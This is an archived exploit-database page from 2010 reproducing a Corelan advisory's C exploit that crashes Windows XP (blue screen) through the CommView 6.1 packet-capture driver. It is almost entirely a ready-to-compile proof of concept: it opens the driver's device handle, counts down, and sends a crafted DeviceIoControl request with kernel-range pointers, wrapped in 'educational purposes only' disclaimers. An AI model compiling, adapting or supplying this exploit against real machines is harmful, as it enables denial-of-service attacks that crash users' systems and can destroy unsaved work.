CommView Version 6.1 (Build 636) Local Denial Of Service (BS
Posted on 23 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD) </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================================== CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD) =============================================================== /*-------------------------------------------------------------------------*/ /** # Exploit Title : CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD) # Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030 # Date : April 23rd, 2010 # Author : p4r4N0ID (T.B) # Bug found by : p4r4N0ID (T.B) # Software Link : http://www.tamos.com/download/main/ # Version : Version 6.1 (Build 636) # OS : Windows # Tested on : Windows XP sp2 En (VMWARE) # Type of vuln : DoS # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes. # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # **/ /*--------------------------------------------------------------------------*/ #include <windows.h> #include <stdio.h> VOID ShowError() { LPVOID lpMsgBuf; FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL); MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0); exit(1); } int __cdecl main( int argc , char * argv[]) { HANDLE hDevice; DWORD junk; int i = 10; system("cls"); printf ("|------------------------------------------------------------------|"); printf ("| __ __ |"); printf ("| _________ ________ / /___ _____ / /____ ____ _____ ___ |"); printf ("| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"); printf ("| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"); printf ("| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"); printf ("| |"); printf ("| http://www.corelan.be:8800 |"); printf ("| security@corelan.be |"); printf ("| |"); printf ("|-------------------------------------------------[ EIP Hunters ]--|"); printf ("[+] CommView Local Denial Of Service (BSOD) - by p4r4N0ID(T.B)"); //CHANGE the GUID so it match your device name //find it in: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersInterfaces{GUID} hDevice = CreateFileA("\\.\CV2K_{916BB164-6D0D-45C0-B6C2-79B42A522C17}", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { ShowError(); return EXIT_FAILURE; } printf(" [!] Started Countdown"); for(i;i>=1;i--) { printf(" -[ %d ]- ",i); if(i==1) printf(" [+] Bye Bye, BOOM!!!"); Sleep(1000); } DeviceIoControl(hDevice, 0x00002578, (LPVOID) 0x80000001, 0, (LPVOID) 0x80000002, 0, &junk, (LPOVERLAPPED)NULL); return EXIT_SUCCESS; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
